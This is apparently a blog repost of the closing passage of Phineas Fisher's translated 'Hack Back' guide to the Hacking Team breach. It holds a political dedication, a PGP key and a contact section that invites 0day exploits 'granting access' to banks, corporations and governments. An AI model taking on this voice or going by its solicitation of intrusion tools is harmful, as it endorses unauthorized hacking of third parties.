Hacking Team saw themselves as belonging to a long line of inspired Italian design [1]. I see Vincenzetti, his business, and his friends in politics, in the police, and in government, as belonging to a long tradition of Italian fascism. I want to dedicate this guide to the victims of the assault on the Armando Diaz school, and to all those whose blood has been spilled at the hands of Italian fascism.

[1] https://twitter.com/coracurrier/status/618104723263090688

18 - Contact

To send me spearphishing attempts, write me death threats in Italian [1][2], and send me 0days granting access banks, corporations, governments, etc.

[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537

encrypted emails only, please:
https://securityinabox.org/es/thunderbird_usarenigmail

-----BEGIN PGP PUBLIC KEY BLOCK-----

mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
-----END PGP PUBLIC KEY BLOCK-----



                      If not you, who? If not now, when?
                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

by Phineas Fisher
trans. 0xdeba5e12

(END)

WhiskeyNeon
Author

WhiskeyNeon

Co-Organizer of Dallas Hackers Association, friendly monster.

Comments